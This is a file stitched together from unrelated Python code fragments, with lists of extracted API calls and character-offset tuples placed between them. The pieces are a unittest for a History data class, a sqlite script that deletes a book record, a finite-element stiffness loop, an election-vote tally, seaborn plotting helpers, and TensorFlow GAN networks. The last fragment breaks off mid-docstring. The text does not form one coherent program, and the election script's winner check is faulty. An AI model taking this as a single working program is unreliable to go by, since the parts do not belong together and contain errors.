dir_path = os.path.dirname(os.path.realpath(__file__))
class Test_History(unittest.TestCase):
    """Exercises clairvoyant.History against the tsla-sentiment.csv fixture
    (232 rows): loading, column renaming, iteration, date/integer slicing,
    feature selection and the derived return_rate column."""
    def setUp(self):
        """Load the fixture with a column map from canonical to CSV names."""
        column_map = {
            'Date': 'Unnamed: 0', 'Open': 'open', 'High': 'high', 'Low': 'low',
            'Close': 'close', 'Volume': 'volume', 'Sentiment': 'sentiment',
            'Influence': 'influence'
        }
        self.sample = History(
            os.path.join(dir_path, 'tsla-sentiment.csv'), col_map=column_map
        )
    def test_get_data(self):
        """Column access works by name and by attribute; bad names raise."""
        data = self.sample
        self.assertTrue(isinstance(data._df, pd.DataFrame))
        # KeyError happens if the column doesn't exist.
        self.assertRaises(KeyError, data.__getitem__, 'Blah')
        # You can get a column by name, returns a series.
        self.assertTrue(isinstance(data['Close'], pd.Series))
        # You can get a column by attribute, returns a series.
        self.assertTrue(isinstance(data.close, pd.Series))
    def test_rename(self):
        """rename() updates the column map and the attribute access names."""
        data = self.sample
        data.rename(columns={'date': 'Date', 'close': 'Close'})
        self.assertEqual(data._col_map['Date'], 'Date')
        self.assertEqual(data._col_map['Close'], 'Close')
        self.assertTrue(isinstance(data.date, pd.Series))
        self.assertTrue(isinstance(data.close, pd.Series))
    def test_iteration(self):
        """Iterating a History yields one item per fixture row (232)."""
        data = self.sample
        count = 0
        for i in data:
            count += 1
        print(count)
        self.assertEqual(count, 232)
    def test_slicing_with_dates(self):
        """Datetime slicing is endpoint-inclusive and respects renames."""
        data = self.sample
        tz = data._timezone
        start = tz.localize(pd.to_datetime('2017-02-24 06:30:00'))
        end = tz.localize(pd.to_datetime('2017-02-24 07:00:00'))
        # slicing produces a new History object
        cpy = data[start:end]
        self.assertEqual(cpy.date.iloc[0], '2017-02-24 06:30:00')
        self.assertEqual(cpy.date.iloc[-1], '2017-02-24 07:00:00')
        # renaming will change the namedtuple attributes
        data.rename(columns={'date': 'mydate'})
        for row in data[start:end]:
            self.assertTrue(hasattr(row, 'mydate'))
            self.assertFalse(hasattr(row, 'date'))
    def test_slicing_with_integers(self):
        """Integer slices yield namedtuple-like rows."""
        data = self.sample
        # can also slice by integer index
        for row in data[0:3]:
            self.assertTrue(isinstance(row, tuple))
            self.assertTrue(hasattr(row, 'date'))
    def test_len(self):
        """len() matches the fixture row count."""
        data = self.sample
        self.assertEqual(len(data), 232)
    def test_features(self):
        """The features list is readable, assignable and validated."""
        data = self.sample
        self.assertEqual(data.features, ['Sentiment', 'Influence'])
        data.features = ['Volume']
        self.assertEqual(data.features, ['Volume'])
        self.assertRaises(KeyError, setattr, data, 'features', ['test'])
    def test_getting_rows(self):
        """Row access: by integer index (Series) or by date (DataFrame)."""
        data = self.sample
        print(data[-1])
        # You can get by index, returns a series
        self.assertTrue(isinstance(data[0], pd.Series))
        self.assertEqual(data.date.iloc[-1], '2017-03-10 13:00:00')
        print(data['2017-03-10 13:00:00'])
        # You can also get by date, returns a dataframe
        self.assertTrue(isinstance(data['2017-03-10 13:00:00'], pd.DataFrame))
        self.assertEqual(data['2017-03-10 13:00:00'].index[0], 231)
    def test_rate_of_return(self):
        """return_rate[1] matches the known fixture value (float compare)."""
        data = self.sample
        self.assertTrue(np.isclose(
            data.return_rate[1], -0.00061491160645644951)
        )
|
[
"os.path.realpath",
"pandas.to_datetime",
"os.path.join",
"numpy.isclose"
] |
[((136, 162), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (152, 162), False, 'import os\n'), ((499, 543), 'os.path.join', 'os.path.join', (['dir_path', '"""tsla-sentiment.csv"""'], {}), "(dir_path, 'tsla-sentiment.csv')\n", (511, 543), False, 'import os\n'), ((1708, 1745), 'pandas.to_datetime', 'pd.to_datetime', (['"""2017-02-24 06:30:00"""'], {}), "('2017-02-24 06:30:00')\n", (1722, 1745), True, 'import pandas as pd\n'), ((1773, 1810), 'pandas.to_datetime', 'pd.to_datetime', (['"""2017-02-24 07:00:00"""'], {}), "('2017-02-24 07:00:00')\n", (1787, 1810), True, 'import pandas as pd\n'), ((3482, 3537), 'numpy.isclose', 'np.isclose', (['data.return_rate[1]', '(-0.0006149116064564495)'], {}), '(data.return_rate[1], -0.0006149116064564495)\n', (3492, 3537), True, 'import numpy as np\n')]
|
# importando SQLite
import sqlite3 as lite
# criando conexão / criando novo BD
# Open the connection, creating livraria.db on first use.
con = lite.connect('livraria.db')

# Sample category inserts, kept for reference:
# with con:
#     cur = con.cursor()
#     cur.execute("INSERT INTO Categoria (nome) VALUES ('Romance') ")
#     cur.execute("INSERT INTO Categoria (nome) VALUES ('Drama') ")
#     cur.execute("INSERT INTO Categoria (nome) VALUES ('Aventura') ")
#     cur.execute("INSERT INTO Categoria (nome) VALUES ('Terror') ")
#     cur.execute("INSERT INTO Categoria (nome) VALUES ('Comedia') ")

try:
    # Parameterized delete of book id 1; ``with con`` commits on success
    # and rolls back on error.  (The original comment said "update" but the
    # statement is a DELETE.)
    valores = [1]
    with con:
        cur = con.cursor()
        query = "DELETE FROM Livro WHERE id=?"
        cur.execute(query, valores)

    # Show what is left in Livro.
    cur = con.cursor()
    cur.execute("SELECT * FROM Livro")
    print(cur.fetchall())
finally:
    # Fix: the connection was previously never closed.
    con.close()
|
[
"sqlite3.connect"
] |
[((86, 113), 'sqlite3.connect', 'lite.connect', (['"""livraria.db"""'], {}), "('livraria.db')\n", (98, 113), True, 'import sqlite3 as lite\n')]
|
import numpy as np
# ---- 2-D finite-element stiffness computation over a structured grid ----
# 891 nodes laid out as 81 columns x 11 rows with 0.1 spacing:
# x = (i // 11) / 10, y = (i % 11) / 10.
numNodes = 891
coord = np.zeros((numNodes,2))
# Global stiffness matrix, 2 dofs (x, y) per node.
# NOTE(review): K is allocated but the element matrices Ke are never
# scattered into it in this chunk — presumably assembly happens later;
# confirm against the rest of the file.
K = np.zeros((numNodes*2,numNodes*2))
for i in range(numNodes):
    coord[i,0] = int(i / 11) / 10
    coord[i,1] = i % 11 / 10
# 2x2 Gauss quadrature points: (xi, eta) = (+-1/sqrt(3), +-1/sqrt(3)).
gaussxi = np.array([-1,1,1,-1]) / np.sqrt(3)
gausseta = np.array([-1,-1,1,1]) / np.sqrt(3)
numEle = 800
E = 1e5
nu = 0.25
# Plane-stress constitutive matrix D = E/(1-nu^2) * [[1,nu,0],[nu,1,0],[0,0,(1-nu)/2]].
D = E / (1 - nu**2)*np.array([[1,nu,0],[nu,1,0],[0,0,(1-nu)/2]])
for e in range(numEle):
    # Element stiffness for a 4-node quadrilateral (8 dofs).
    Ke = np.zeros((8,8))
    # Index of the element's first corner node (80 elements across, 10 up).
    start = int((e // 10) * 11 + e % 10)
    xe = np.zeros((4,2))
    # Element corner coordinates, counter-clockwise.
    xe[0,:] = coord[start,:]
    xe[1,:] = coord[start+11,:]
    xe[2,:] = coord[start+12,:]
    xe[3,:] = coord[start+1,:]
    for igauss in range(4):
        xi = gaussxi[igauss]
        eta = gausseta[igauss]
        # Bilinear shape-function derivatives w.r.t. natural coords (xi, eta).
        Jpar = np.zeros((2,4))
        Jpar[0,0] = -(1 - eta)/4
        Jpar[0,1] = (1 - eta)/4
        Jpar[0,2] = (1 + eta)/4
        Jpar[0,3] = -(1 + eta)/4
        Jpar[1,0] = -(1 - xi)/4
        Jpar[1,1] = -(1 + xi)/4
        Jpar[1,2] = (1 + xi)/4
        Jpar[1,3] = (1 - xi)/4
        # Jacobian of the isoparametric map and its inverse.
        J = np.dot(Jpar,xe)
        Jinv = np.linalg.inv(J)
        # Shape-function derivatives in physical coords, and the 3x8
        # strain-displacement matrix B.
        Npar = np.zeros((2,4))
        B = np.zeros((3,8))
        for i in range(4):
            Npar[0,i] = Jinv[0,0] * Jpar[0,i] + Jinv[0,1] * Jpar[1,i]
            Npar[1,i] = Jinv[1,0] * Jpar[0,i] + Jinv[1,1] * Jpar[1,i]
            B[0,2*i] = Npar[0,i]
            B[1,2*i+1] = Npar[1,i]
            B[2,2*i] = Npar[1,i]
            B[2,2*i+1] = Npar[0,i]
        # Gauss-point contribution: B^T * D * B * det(J) (unit weights).
        temp = np.dot(np.transpose(B),D)
        detJ = np.linalg.det(J)
        Ke = Ke + np.dot(temp,B)*detJ
|
[
"numpy.zeros",
"numpy.transpose",
"numpy.linalg.det",
"numpy.array",
"numpy.linalg.inv",
"numpy.dot",
"numpy.sqrt"
] |
[((43, 66), 'numpy.zeros', 'np.zeros', (['(numNodes, 2)'], {}), '((numNodes, 2))\n', (51, 66), True, 'import numpy as np\n'), ((70, 108), 'numpy.zeros', 'np.zeros', (['(numNodes * 2, numNodes * 2)'], {}), '((numNodes * 2, numNodes * 2))\n', (78, 108), True, 'import numpy as np\n'), ((208, 232), 'numpy.array', 'np.array', (['[-1, 1, 1, -1]'], {}), '([-1, 1, 1, -1])\n', (216, 232), True, 'import numpy as np\n'), ((232, 242), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (239, 242), True, 'import numpy as np\n'), ((254, 278), 'numpy.array', 'np.array', (['[-1, -1, 1, 1]'], {}), '([-1, -1, 1, 1])\n', (262, 278), True, 'import numpy as np\n'), ((278, 288), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (285, 288), True, 'import numpy as np\n'), ((341, 397), 'numpy.array', 'np.array', (['[[1, nu, 0], [nu, 1, 0], [0, 0, (1 - nu) / 2]]'], {}), '([[1, nu, 0], [nu, 1, 0], [0, 0, (1 - nu) / 2]])\n', (349, 397), True, 'import numpy as np\n'), ((420, 436), 'numpy.zeros', 'np.zeros', (['(8, 8)'], {}), '((8, 8))\n', (428, 436), True, 'import numpy as np\n'), ((486, 502), 'numpy.zeros', 'np.zeros', (['(4, 2)'], {}), '((4, 2))\n', (494, 502), True, 'import numpy as np\n'), ((729, 745), 'numpy.zeros', 'np.zeros', (['(2, 4)'], {}), '((2, 4))\n', (737, 745), True, 'import numpy as np\n'), ((1031, 1047), 'numpy.dot', 'np.dot', (['Jpar', 'xe'], {}), '(Jpar, xe)\n', (1037, 1047), True, 'import numpy as np\n'), ((1062, 1078), 'numpy.linalg.inv', 'np.linalg.inv', (['J'], {}), '(J)\n', (1075, 1078), True, 'import numpy as np\n'), ((1094, 1110), 'numpy.zeros', 'np.zeros', (['(2, 4)'], {}), '((2, 4))\n', (1102, 1110), True, 'import numpy as np\n'), ((1122, 1138), 'numpy.zeros', 'np.zeros', (['(3, 8)'], {}), '((3, 8))\n', (1130, 1138), True, 'import numpy as np\n'), ((1525, 1541), 'numpy.linalg.det', 'np.linalg.det', (['J'], {}), '(J)\n', (1538, 1541), True, 'import numpy as np\n'), ((1491, 1506), 'numpy.transpose', 'np.transpose', (['B'], {}), '(B)\n', (1503, 1506), True, 'import numpy 
as np\n'), ((1560, 1575), 'numpy.dot', 'np.dot', (['temp', 'B'], {}), '(temp, B)\n', (1566, 1575), True, 'import numpy as np\n')]
|
import os
import csv
# PyPoll: tally an election CSV, compute per-candidate percentages, pick
# the plurality winner, and write the report to the terminal and a file.
votesCast = []
Khan = []
Correy = []
Li = []
O_Tooley = []

electionData_csv = os.path.join("Resources", "election_data.csv")

with open(electionData_csv, 'r') as csvfile:
    next(csvfile)  # skip the header row
    csvreader = csv.reader(csvfile, delimiter=',')
    for row in csvreader:
        candidate = str(row[2])
        votesCast.append(row[2])
        if candidate == "Khan":
            Khan.append(row[2])
        if candidate == "Correy":
            Correy.append(row[2])
        if candidate == "Li":
            Li.append(row[2])
        if candidate == "O'Tooley":
            O_Tooley.append(row[2])

# Totals and whole-number percentages of the overall vote.
totalVotes = len(votesCast)
totalKhan = len(Khan)
KhanPer = round(totalKhan / totalVotes * 100)
totalCorrey = len(Correy)
CorreyPer = round(totalCorrey / totalVotes * 100)
totalLi = len(Li)
LiPer = round(totalLi / totalVotes * 100)
totalO_Tooley = len(O_Tooley)
O_TooleyPer = round(totalO_Tooley / totalVotes * 100)

# Fix: the original chained conditions (`totalKhan > totalCorrey and
# totalLi and totalO_Tooley`) only compared the first pair — the remaining
# operands were mere truthiness checks — so the winner could be wrong.
# Pick the true plurality winner instead.
voteTotals = {
    "Khan": totalKhan,
    "Correy": totalCorrey,
    "Li": totalLi,
    "O'Tooley": totalO_Tooley,
}
winner = max(voteTotals, key=voteTotals.get)

summary = [
    "Election Results",
    "-------------------------",
    f'Total Votes: {totalVotes}',
    "-------------------------",
    f'Khan: {KhanPer}% ({totalKhan})',
    f'Correy: {CorreyPer}% ({totalCorrey})',
    f'Li: {LiPer}% ({totalLi})',
    f"O'Tooley: {O_TooleyPer}% ({totalO_Tooley})",
    "-------------------------",
    f'Winner: {winner}',
    "-------------------------",
]

# Print to terminal.
for line in summary:
    print(line)

# Append to the results file (append mode preserved from the original);
# the handle is now closed even if a write fails.
with open("Election_Results.txt", "a") as f:
    for line in summary:
        print(line, file=f)
|
[
"csv.reader",
"os.path.join"
] |
[((110, 156), 'os.path.join', 'os.path.join', (['"""Resources"""', '"""election_data.csv"""'], {}), "('Resources', 'election_data.csv')\n", (122, 156), False, 'import os\n'), ((246, 280), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""'}), "(csvfile, delimiter=',')\n", (256, 280), False, 'import csv\n')]
|
import seaborn as sns
import pandas as pd
import numpy as np
import matplotlib.markers as mk
import matplotlib.pylab as plt
def sp_plot(df, x_col, y_col, color_col, ci=None, domain_range=None,
            ax=None, aggplot=True, x_jitter=0, height=3, legend=True):
    """Scatter plot of *y_col* vs *x_col* with one regression line per level
    of *color_col* (distinct marker per level), optionally overlaid with a
    whole-data regression line.

    Parameters
    ----------
    df : DataFrame with the three named columns.
    ci : confidence-interval width for the regression lines (None = off).
    domain_range : [xmin, xmax, ymin, ymax] axis limits; defaults to
        [0, 20, 0, 20].  (Fix: the mutable-list default argument was
        replaced by a None sentinel.)
    ax : unused; kept for backward compatibility with existing callers.
    """
    if domain_range is None:
        domain_range = [0, 20, 0, 20]
    # One distinct marker per unique level of the colour column.
    all_markers = list(mk.MarkerStyle.markers.keys())
    n_markers = df[color_col].unique().shape[0]  # number unique
    cur_markers = all_markers[:n_markers]
    # Fix: pass x/y/data as keywords — seaborn deprecated (and later
    # removed) the positional forms of these parameters.
    sns.lmplot(x=x_col, y=y_col, data=df, hue=color_col, ci=ci,
               markers=cur_markers, palette="Set1", x_jitter=x_jitter,
               height=height, legend=legend)
    if aggplot:
        # add a whole-data regression line, but don't cover the scatter data
        sns.regplot(x=x_col, y=y_col, data=df, color='black', scatter=False,
                    ci=ci)
    plt.axis(domain_range)
def plot_clustermat(z, fmt=None):
    """Black-and-white matshow for clustering / feature-allocation matrices.

    Parameters
    ----------
    z : nparray, square to be plotted
    fmt : if z is not a square, then str of what it is
        'crplist' : a list of values from zero to k
        'ibplist' : a list of lists of varying lengths
        'list'    : a list, but not nparray, otherwise ready to plot
    """
    converters = {
        'crplist': list_to_mat,
        'ibplist': make_square,
        'list': np.asarray,
        None: lambda mat: mat,
    }
    z_mat = converters[fmt](z)
    # print(z_mat)
    N, K = z_mat.shape
    # Disable seaborn's default grid so only our cell-border grid shows.
    sns.set_style("whitegrid", {'axes.grid': False})
    plt.matshow(z_mat, cmap=plt.cm.gray_r)
    axes = plt.gca()
    # Major ticks (with labels) on the integers...
    axes.set_xticks(np.arange(0, K, 1))
    axes.set_yticks(np.arange(0, N, 1))
    axes.set_xticklabels(np.arange(0, K, 1))
    axes.set_yticklabels(np.arange(0, N, 1))
    # ...and minor ticks at the half marks to carry the cell borders.
    axes.set_xticks(np.arange(-.5, K, 1), minor=True)
    axes.set_yticks(np.arange(-.5, N, 1), minor=True)
    plt.grid(which='minor', color='k', linestyle='-', linewidth=3)
def make_square(z):
    """Zero-pad a list of variable-length rows into a rectangular array
    whose width equals the length of the final row."""
    width = len(z[-1])
    padded = []
    for row in z:
        padded.append(np.concatenate((row, np.zeros([width - len(row)]))))
    return np.asarray(padded)
def list_to_mat(z):
    """One-hot encode cluster labels.

    Turns a length-N sequence of integer labels in 0..K (K = max(z)) into
    an N x (K+1) binary matrix whose row i is the one-hot vector for z[i].
    (Fix: the original docstring wrongly claimed values "1 to K" and an
    NxK result.)
    """
    K = np.max(z)
    eye = np.eye(K + 1)
    return np.asarray([eye[label] for label in z])
|
[
"seaborn.set_style",
"seaborn.lmplot",
"matplotlib.markers.MarkerStyle.markers.keys",
"numpy.asarray",
"matplotlib.pylab.axis",
"matplotlib.pylab.gca",
"seaborn.regplot",
"numpy.max",
"numpy.arange",
"numpy.eye",
"matplotlib.pylab.grid",
"matplotlib.pylab.matshow"
] |
[((636, 781), 'seaborn.lmplot', 'sns.lmplot', (['x_col', 'y_col'], {'data': 'df', 'hue': 'color_col', 'ci': 'ci', 'markers': 'cur_markers', 'palette': '"""Set1"""', 'x_jitter': 'x_jitter', 'height': 'height', 'legend': 'legend'}), "(x_col, y_col, data=df, hue=color_col, ci=ci, markers=cur_markers,\n palette='Set1', x_jitter=x_jitter, height=height, legend=legend)\n", (646, 781), True, 'import seaborn as sns\n'), ((993, 1015), 'matplotlib.pylab.axis', 'plt.axis', (['domain_range'], {}), '(domain_range)\n', (1001, 1015), True, 'import matplotlib.pylab as plt\n'), ((1742, 1790), 'seaborn.set_style', 'sns.set_style', (['"""whitegrid"""', "{'axes.grid': False}"], {}), "('whitegrid', {'axes.grid': False})\n", (1755, 1790), True, 'import seaborn as sns\n'), ((1817, 1855), 'matplotlib.pylab.matshow', 'plt.matshow', (['z_mat'], {'cmap': 'plt.cm.gray_r'}), '(z_mat, cmap=plt.cm.gray_r)\n', (1828, 1855), True, 'import matplotlib.pylab as plt\n'), ((1904, 1913), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (1911, 1913), True, 'import matplotlib.pylab as plt\n'), ((2284, 2346), 'matplotlib.pylab.grid', 'plt.grid', ([], {'which': '"""minor"""', 'color': '"""k"""', 'linestyle': '"""-"""', 'linewidth': '(3)'}), "(which='minor', color='k', linestyle='-', linewidth=3)\n", (2292, 2346), True, 'import matplotlib.pylab as plt\n'), ((2669, 2678), 'numpy.max', 'np.max', (['z'], {}), '(z)\n', (2675, 2678), True, 'import numpy as np\n'), ((2689, 2702), 'numpy.eye', 'np.eye', (['(K + 1)'], {}), '(K + 1)\n', (2695, 2702), True, 'import numpy as np\n'), ((2712, 2747), 'numpy.asarray', 'np.asarray', (['[tmp[z_i] for z_i in z]'], {}), '([tmp[z_i] for z_i in z])\n', (2722, 2747), True, 'import numpy as np\n'), ((490, 519), 'matplotlib.markers.MarkerStyle.markers.keys', 'mk.MarkerStyle.markers.keys', ([], {}), '()\n', (517, 519), True, 'import matplotlib.markers as mk\n'), ((915, 986), 'seaborn.regplot', 'sns.regplot', (['x_col', 'y_col'], {'data': 'df', 'color': '"""black"""', 'scatter': 
'(False)', 'ci': 'ci'}), "(x_col, y_col, data=df, color='black', scatter=False, ci=ci)\n", (926, 986), True, 'import seaborn as sns\n'), ((1932, 1950), 'numpy.arange', 'np.arange', (['(0)', 'K', '(1)'], {}), '(0, K, 1)\n', (1941, 1950), True, 'import numpy as np\n'), ((1970, 1988), 'numpy.arange', 'np.arange', (['(0)', 'N', '(1)'], {}), '(0, N, 1)\n', (1979, 1988), True, 'import numpy as np\n'), ((2043, 2061), 'numpy.arange', 'np.arange', (['(0)', 'K', '(1)'], {}), '(0, K, 1)\n', (2052, 2061), True, 'import numpy as np\n'), ((2086, 2104), 'numpy.arange', 'np.arange', (['(0)', 'N', '(1)'], {}), '(0, N, 1)\n', (2095, 2104), True, 'import numpy as np\n'), ((2156, 2177), 'numpy.arange', 'np.arange', (['(-0.5)', 'K', '(1)'], {}), '(-0.5, K, 1)\n', (2165, 2177), True, 'import numpy as np\n'), ((2208, 2229), 'numpy.arange', 'np.arange', (['(-0.5)', 'N', '(1)'], {}), '(-0.5, N, 1)\n', (2217, 2229), True, 'import numpy as np\n'), ((1592, 1605), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (1602, 1605), True, 'import numpy as np\n')]
|
import tensorflow as tf
from tflib.layers import *
def mnist_generator(z, is_training=True):
    """DCGAN-style generator mapping latent vectors *z* to 28x28x1 images
    in [0, 1] (sigmoid output).  No spectral normalisation."""
    net_dim = 64
    use_sn = False
    update_collection = None  # NOTE(review): assigned but never used here.
    with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
        # Project the latent vector and reshape to a 4x4 feature map.
        output = linear(z, 4*4*4*net_dim, sn=use_sn, name='linear')
        output = batch_norm(output, is_training=is_training, name='bn_linear')
        output = tf.nn.relu(output)
        output = tf.reshape(output, [-1, 4, 4, 4*net_dim])
        # deconv-bn-relu
        output = deconv2d(output, 2*net_dim, 5, 2, sn=use_sn, name='deconv_0')
        output = batch_norm(output, is_training=is_training, name='bn_0')
        output = tf.nn.relu(output)
        # Crop 8x8 -> 7x7 so the two remaining stride-2 deconvs end at 28x28.
        output = output[:, :7, :7, :]
        output = deconv2d(output, net_dim, 5, 2, sn=use_sn, name='deconv_1')
        output = batch_norm(output, is_training=is_training, name='bn_1')
        output = tf.nn.relu(output)
        # Final deconv to a single channel, squashed to [0, 1].
        output = deconv2d(output, 1, 5, 2, sn=use_sn, name='deconv_2')
        output = tf.sigmoid(output)
    return output
def mnist_discriminator(x, update_collection=None, is_training=False):
    """Spectrally-normalized convolutional discriminator for MNIST.

    Returns one raw logit per input sample (shape (batch,)).
    """
    net_dim = 64
    use_sn = True
    with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
        net = x
        # three conv-lrelu stages with channel widths 1x, 2x, 4x net_dim
        for idx, mult in enumerate((1, 2, 4)):
            net = conv2d(net, mult * net_dim, 5, 2, sn=use_sn,
                         update_collection=update_collection, name='conv%d' % idx)
            net = lrelu(net)
        # flatten and project down to a single logit
        net = tf.reshape(net, [-1, 4 * 4 * 4 * net_dim])
        net = linear(net, 1, sn=use_sn, update_collection=update_collection, name='linear')
        return tf.reshape(net, [-1])
def mnist_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
    """Convolutional encoder for MNIST.

    Projects to 2*latent_dim and returns the two latent_dim-wide halves
    of that linear head as a tuple.
    """
    with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
        net = x
        # three conv stages (widths 1x, 2x, 4x net_dim), optional BN, then ReLU
        for idx, mult in enumerate((1, 2, 4)):
            net = conv2d(net, mult * net_dim, 5, 2, name='conv%d' % idx)
            if use_bn:
                net = batch_norm(net, is_training=is_training, name='bn%d' % idx)
            net = tf.nn.relu(net)
        net = tf.reshape(net, [-1, 4 * 4 * 4 * net_dim])
        net = linear(net, 2 * latent_dim, name='linear')
        return net[:, :latent_dim], net[:, latent_dim:]
def cifar10_generator_resnet(z, is_training=False):
    """ResNet generator for 32x32x3 CIFAR-10 images; tanh output in [-1, 1]."""
    with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
        net = linear(z, 4 * 4 * 256, name='linear_0')
        net = tf.reshape(net, [-1, 4, 4, 256])
        # three upsampling residual blocks: 4x4 -> 8x8 -> 16x16 -> 32x32
        for idx in range(3):
            net = resblock_up(net, 256, is_training=is_training, name='block_%d' % idx)
        # output head: bn -> relu -> 3x3 conv to RGB -> tanh
        net = batch_norm(net, is_training=is_training, name='g_bn')
        net = tf.nn.relu(net)
        net = conv2d(net, 3, 3, 1, name='conv_last')
        return tf.tanh(net)
def cifar10_discriminator_resnet(x, update_collection=None, is_training=False):
    """Spectrally-normalized ResNet discriminator for CIFAR-10; returns raw logits."""
    with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
        net = inblock(x, 128, sn=True, update_collection=update_collection, name='block_0')  # 16 x 16
        net = resblock_down(net, 128, sn=True, update_collection=update_collection, name='block_1')  # 8 x 8
        # two residual blocks without further downsampling
        for idx in (2, 3):
            net = resblock_down(net, 128, sn=True, update_collection=update_collection,
                                downsample=False, name='block_%d' % idx)
        net = tf.nn.relu(net)
        net = tf.reduce_sum(net, [1, 2])  # global sum pooling over spatial dims
        net = linear(net, 1, sn=True, update_collection=update_collection, name='linear')
        return tf.reshape(net, [-1])
def cifar10_generator(z, is_training=False):
    """DCGAN-style generator for 32x32x3 CIFAR-10 images.

    Args:
        z: latent noise tensor.
        is_training: controls batch-norm statistics.

    Returns:
        Tensor of shape (batch, 32, 32, 3), squashed to [-1, 1] with tanh.
    """
    net_dim = 64
    use_sn = False  # no spectral normalization in the generator
    # NOTE: removed an unused local `update_collection = None` (never referenced).
    with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
        output = linear(z, 4*4*8*net_dim, sn=use_sn, name='linear')
        output = batch_norm(output, is_training=is_training, name='bn_linear')
        output = tf.nn.relu(output)
        output = tf.reshape(output, [-1, 4, 4, 8*net_dim])
        # deconv-bn-relu: 4x4 -> 8x8 -> 16x16 -> 32x32, halving channels each step
        for i in range(3):
            output = deconv2d(output, 2**(2-i)*net_dim, sn=use_sn, name='deconv_' + str(i))
            output = batch_norm(output, is_training=is_training, name='bn_' + str(i))
            output = tf.nn.relu(output)
        # final conv to 3 RGB channels
        output = conv2d(output, 3, sn=use_sn, name='conv3')
        output = tf.tanh(output)
        return output
def cifar10_discriminator(x, update_collection=None, is_training=False):
    """Spectrally-normalized convolutional discriminator for CIFAR-10.

    Returns one raw logit per input sample (shape (batch,)).
    """
    net_dim = 64
    use_sn = True
    with tf.variable_scope('Discriminator', reuse=tf.AUTO_REUSE):
        net = x
        layer = 0
        # three (3x3 stride-1, 4x4 stride-2) conv pairs at widths 1x, 2x, 4x net_dim
        for mult in (1, 2, 4):
            net = conv2d(net, mult * net_dim, 3, 1, sn=use_sn,
                         update_collection=update_collection, name='conv%d' % layer)
            net = lrelu(net)
            net = conv2d(net, mult * net_dim, 4, 2, sn=use_sn,
                         update_collection=update_collection, name='conv%d' % (layer + 1))
            net = lrelu(net)
            layer += 2
        # final widening conv (no activation), flatten, linear projection to one logit
        net = conv2d(net, 8 * net_dim, 3, 1, sn=use_sn,
                     update_collection=update_collection, name='conv6')
        net = tf.reshape(net, [-1, 4*4*8*net_dim])
        net = linear(net, 1, sn=use_sn, update_collection=update_collection, name='linear')
        return tf.reshape(net, [-1])
def cifar10_encoder(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
    """Convolutional encoder for CIFAR-10.

    Projects to 2*latent_dim and returns the two latent_dim-wide halves
    of that linear head as a tuple.
    """
    with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
        # (channels, kernel, stride) per stage; only the first stage keeps resolution
        specs = [(net_dim, 3, 1), (2 * net_dim, 4, 2),
                 (4 * net_dim, 4, 2), (8 * net_dim, 4, 2)]
        net = x
        for idx, (width, ksize, stride) in enumerate(specs):
            net = conv2d(net, width, ksize, stride, name='conv%d' % idx)
            if use_bn:
                net = batch_norm(net, is_training=is_training, name='bn%d' % idx)
            net = tf.nn.relu(net)
        net = tf.reshape(net, [-1, 4 * 4 * 8 * net_dim])
        net = linear(net, 2 * latent_dim, name='linear')
        return net[:, :latent_dim], net[:, latent_dim:]
def cifar10_encoder_resnet(x, is_training=False, use_bn=False, net_dim=64, latent_dim=128):
    """ResNet encoder for CIFAR-10; returns the two latent_dim-wide halves of a linear head."""
    with tf.variable_scope('Encoder', reuse=tf.AUTO_REUSE):
        net = inblock(x, 128, sn=False, name='block_0')  # 16 x 16
        net = resblock_down(net, 128, sn=False, name='block_1')  # 8 x 8
        # two residual blocks without further downsampling
        for idx in (2, 3):
            net = resblock_down(net, 128, sn=False, downsample=False, name='block_%d' % idx)
        net = tf.nn.relu(net)
        net = tf.reduce_sum(net, [1, 2])  # global sum pooling
        net = linear(net, 2 * latent_dim, sn=False, name='linear')
        return net[:, :latent_dim], net[:, latent_dim:]
def celeba_generator(z, is_training=True):
    """DCGAN-style generator for 64x64x3 CelebA images.

    Args:
        z: latent noise tensor.
        is_training: controls batch-norm statistics.

    Returns:
        Tensor of shape (batch, 64, 64, 3), squashed to [-1, 1] with tanh.
    """
    net_dim = 64
    use_sn = False  # no spectral normalization in the generator
    # NOTE: removed an unused local `update_collection = None` (never referenced).
    with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
        output = linear(z, 4 * 4 * 8 * net_dim, sn=use_sn, name='linear')
        output = batch_norm(output, is_training=is_training, name='bn_linear')
        # NOTE(review): unlike mnist/cifar10 generators there is no ReLU after
        # bn_linear here; preserved as-is to keep behavior -- confirm intent.
        output = tf.reshape(output, [-1, 4, 4, 8 * net_dim])
        # deconv-bn-relu: 4x4 -> 8x8 -> 16x16 -> 32x32, halving channels each step
        for i in range(3):
            output = deconv2d(output, 2 ** (2 - i) * net_dim, sn=use_sn, name='deconv_' + str(i))
            output = batch_norm(output, is_training=is_training, name='bn_' + str(i))
            output = tf.nn.relu(output)
        # final stride-2 deconv to 64x64x3
        output = deconv2d(output, 3, sn=use_sn, name='deconv_out')
        output = tf.tanh(output)
        return output
def celeba_generator_resnet(z, is_training=False):
    """ResNet generator for 64x64x3 CelebA images; tanh output in [-1, 1]."""
    with tf.variable_scope('Generator', reuse=tf.AUTO_REUSE):
        net = linear(z, 4 * 4 * 256, name='linear_0')
        net = tf.reshape(net, [-1, 4, 4, 256])
        # four upsampling residual blocks: 4x4 -> 8x8 -> 16x16 -> 32x32 -> 64x64
        for idx in range(4):
            net = resblock_up(net, 256, is_training=is_training, name='block_%d' % idx)
        # output head: bn -> relu -> 3x3 conv to RGB -> tanh
        net = batch_norm(net, is_training=is_training, name='g_bn')
        net = tf.nn.relu(net)
        net = conv2d(net, 3, 3, 1, name='conv_last')
        return tf.tanh(net)
def celeba_discriminator(x, update_collection=None, is_training=False):
    """Spectrally-normalized convolutional discriminator for CelebA.

